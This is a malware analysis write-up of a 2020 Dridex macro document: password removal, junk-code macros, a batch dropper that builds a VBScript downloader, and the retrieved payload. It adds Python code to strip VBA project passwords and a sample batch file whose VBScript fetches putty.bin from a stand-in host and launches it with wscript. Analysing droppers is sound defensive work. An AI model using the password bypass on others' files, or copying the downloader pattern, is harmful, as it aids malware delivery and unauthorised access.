Dridex (2020-01-15) – Malicious Document Analysis

This document is… interesting, to say the least. Not only does it drop numerous files, but we also get to learn various facts about supermodels from the 1990s!

I’m not joking. Onto the analysis.


Document Prep

First things first: the original email tells us that the document has a password of 258. That by itself is no big deal; when we open the document we are simply prompted for the password and can get past it easily enough. What matters is that we remove the password afterwards. The document is encrypted with it, so macro extraction tools cannot read the VBA project until the encryption is gone (Save As from Word with the password cleared, or a command-line tool such as msoffcrypto-tool, both work). Otherwise, we will be unable to extract the macros.

I’ll also jump ahead for a moment and say that the macros in the document are password protected as well (a VBA project password, separate from the document password above). So feel free to edit the vbaProject.bin in a hex editor at this time. See the blog post here for how to do that.
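The linked post is not reproduced here, so as an added example (my own code, not the post's) here is the conventional hex-edit done in Python: the VBE stores the project password as an obfuscated DPB="..." record in the PROJECT stream of vbaProject.bin, and renaming that key to DPx= (same length, so no OLE offsets move) makes the VBE ignore it. The sample PROJECT stream is constructed; its GUID, module name and CMG/DPB/GC hex values are made up, and the script assumes the PROJECT stream is stored contiguously in the file, which is the normal case for a stream this small.

```python
"""Neutralise a VBA project password in vbaProject.bin by renaming its DPB record.

Added example (not the post's own tooling): the VBE stores the project password
as an obfuscated DPB="..." line in the PROJECT stream; renaming the key to DPx=
(same length) makes the VBE no longer recognise a password record.
"""
import re
import sys
from typing import Dict, Tuple

# Constructed stand-in for a PROJECT stream. Real ones have this layout, but
# the GUID, module name and the CMG/DPB/GC hex values below are made up.
SAMPLE_PROJECT_STREAM = (
    b'ID="{11111111-2222-3333-4444-555555555555}"\r\n'
    b'Document=ThisDocument/&H00000000\r\n'
    b'Module=modNormalTheme\r\n'
    b'Name="Project"\r\n'
    b'HelpContextID="0"\r\n'
    b'VersionCompatible32="393222000"\r\n'
    b'CMG="0A08F6C1FAC5FAC5FAC5FAC5"\r\n'
    b'DPB="14165A77CB78CB78CB"\r\n'
    b'GC="1E1C7041704170BE"\r\n'
    b'\r\n'
    b'[Host Extender Info]\r\n'
    b'&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000\r\n'
)

# Protection records in the PROJECT stream (MS-OVBA): CMG = protection state,
# DPB = password, GC = visibility state. Each is a hex string in double quotes.
PROTECTION_RE = re.compile(rb'^(CMG|DPB|GC)="([0-9A-Fa-f]*)"', re.MULTILINE)


def protection_records(data: bytes) -> Dict[str, str]:
    """Return the CMG/DPB/GC records found in raw vbaProject.bin bytes."""
    return {k.decode(): v.decode() for k, v in PROTECTION_RE.findall(data)}


def is_password_protected(data: bytes) -> bool:
    """A DPB record is only written when the project has a password."""
    return "DPB" in protection_records(data)


def disable_project_password(data: bytes) -> Tuple[bytes, int]:
    """Rename DPB= to DPx= in place. Returns (patched bytes, records patched).

    The replacement is the same length, so OLE sector and stream sizes stay
    valid and the result can be written straight back as vbaProject.bin.
    Assumption: the PROJECT stream is stored contiguously in the file.
    """
    old, new = b'DPB="', b'DPx="'
    assert len(old) == len(new)
    return data.replace(old, new), data.count(old)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        patched, n = disable_project_password(SAMPLE_PROJECT_STREAM)
        print(f"sample: protected={is_password_protected(SAMPLE_PROJECT_STREAM)} patched={n}")
        print(f"after:  protected={is_password_protected(patched)}")
    else:
        path = sys.argv[1]
        with open(path, "rb") as f:
            data = f.read()
        patched, n = disable_project_password(data)
        with open(path + ".patched", "wb") as f:
            f.write(patched)
        print(f"{path}: records={protection_records(data)} patched={n}")
```

Run it against an extracted vbaProject.bin and put the .patched copy back into the document. The usual follow-up is that the VBE complains about an unexpected error when the project is first opened; click through, then clear the (now unrecognised) password from the project's Properties > Protection tab and save, after which the macros can be viewed and exported normally.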


Macro Analysis

Upon initial look at the macros, we can see that one of them is significantly larger than the others.

dridex04.png

Looking at macro modNormalTheme, we can see that there is a massive amount of junk code. Here is one example:

dridex05.png

But starting with Sub autoopen(), we can see some other things start to happen:

dridex06.png

On line 4423, we can see that a new folder called Colorfonts32 gets created in the root of C:\ and a number of files get written there. The file B4D9D02119.cmd is significantly larger than the others.

dridex07.png

Inspecting that file shows us that, buried amongst the junk code, a file name, visitcard.vbs, is stored in a variable named Robocar. Throughout the rest of the batch file, various commands get written into that file one line at a time via echo commands.

dridex08.png

dridex09.png

Buried further in that file, we see a wscript command that launches the above .vbs file, together with a URL from which a file named putty.bin is downloaded. The download gets written to C:\Colorfonts32, renamed to secpi15.exe, and then started.

dridex10.png

dridex11.png
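Reading a script that a batch dropper assembles with echo statements is tedious by hand, and the junk lines around them are there to make it worse. As an added example (my own code, not the post's), here is a small reconstructor for that pattern: it tracks `set` variables, collects every `echo ... >> file` line by its expanded target, honours batch caret escapes, and reports wscript/cscript launches. The real B4D9D02119.cmd is only shown in screenshots, so the batch text below is constructed; it keeps the post's variable name Robocar and target visitcard.vbs, while the VBScript lines, the Colorfonts variable name and the download URL are made up.

```python
"""Rebuild a script that a batch dropper assembles with `echo ... >> file`.

Added example, not the post's code. The sample batch is constructed to mimic
the dropper described above (Robocar holding visitcard.vbs, lines appended
with echo, then launched with wscript); the VBScript content is made up.
"""
import re
from typing import Dict, List, Tuple

SAMPLE_CMD = r'''
@echo off
rem 5f2a4c junk line, the real file has thousands of these
set Robocar=visitcard.vbs
set Colorfonts=C:\Colorfonts32
echo Dim http, stream >> %Robocar%
set Unused=junk value
echo Set http = CreateObject("MSXML2.XMLHTTP") >> %Robocar%
echo http.Open "GET", "http://example.invalid/putty.bin", False >> %Robocar%
echo If http.Status = 200 Then WScript.Echo "got it" ^& " ok" >> %Robocar%
echo junk >> decoy.txt
wscript.exe %Colorfonts%\%Robocar%
'''

SKIP_RE = re.compile(r'^\s*(rem\b|::|:)', re.IGNORECASE)      # comments and labels
SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_]\w*)=([^"]*)"?\s*$', re.IGNORECASE)
# echo <body> > target  /  echo <body> >> target  (also the `echo.` empty form)
ECHO_RE = re.compile(r'^\s*@?echo(?:\.|\s)(.*?)\s*(>>?)\s*(\S+)\s*$', re.IGNORECASE)
LAUNCH_RE = re.compile(
    r'^\s*(?:start\s+(?:""\s+)?)?((?:w|c)script(?:\.exe)?)\s+(.+?)\s*$', re.IGNORECASE)


def expand(text: str, env: Dict[str, str]) -> str:
    """Expand %VAR% the way cmd.exe does inside a batch file: case-insensitive,
    undefined names become empty, %% is a literal percent sign."""
    out, i = [], 0
    while i < len(text):
        if text[i] != '%':
            out.append(text[i])
            i += 1
        elif text.startswith('%%', i):
            out.append('%')
            i += 2
        else:
            j = text.find('%', i + 1)
            if j == -1:                 # unmatched % is dropped
                i += 1
                continue
            out.append(env.get(text[i + 1:j].lower(), ''))
            i = j + 1
    return ''.join(out)


def unescape(text: str) -> str:
    """Drop the ^ that batch needs before &, |, <, > and ^ inside echo text."""
    return re.sub(r'\^(.)', r'\1', text)


def reconstruct(cmd_text: str) -> Tuple[Dict[str, List[str]], List[Tuple[str, str]]]:
    """Return ({target file: [lines written]}, [(script host, arguments)])."""
    env: Dict[str, str] = {}
    files: Dict[str, List[str]] = {}
    launches: List[Tuple[str, str]] = []
    for raw in cmd_text.splitlines():
        line = raw.strip()
        if not line or SKIP_RE.match(line):
            continue
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
            continue
        m = ECHO_RE.match(line)
        if m:
            body, mode, target = m.groups()
            target = expand(target, env).strip('"')
            if mode == '>':             # a single > truncates: earlier content is lost
                files[target] = []
            # cmd keeps the space before >> in the output; it is stripped here
            files.setdefault(target, []).append(unescape(expand(body, env)))
            continue
        m = LAUNCH_RE.match(line)
        if m:
            launches.append((m.group(1).lower(), expand(m.group(2), env)))
    return files, launches


if __name__ == "__main__":
    files, launches = reconstruct(SAMPLE_CMD)
    for name, lines in files.items():
        print(f"--- {name} ({len(lines)} lines)")
        print("\n".join(lines))
    for host, args in launches:
        print(f"launch: {host} {args}")
```

The output is the dropped VBScript in the order it is written, plus the wscript launch with its path already expanded, which is usually enough to pull the download URL and file names without stepping through the junk. Variables are resolved with the value they hold at the time of each echo, so a dropper that reassigns a name mid-file is still reconstructed correctly.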

Submitting the downloaded file to any.run identifies it as Dridex.

Thanks for reading!


Wait, I thought there would be supermodels!

When the macro executes, we see a function named TestProgressBar. That function calls up a form named ElganteSample, which contains a picture like so:

dridex12.png

After ‘Enable Content’ is clicked, the above picture pops up and various captions are displayed. Captions such as…

dridex13.png

And why is that in here? I haven’t a clue.

Thanks again!
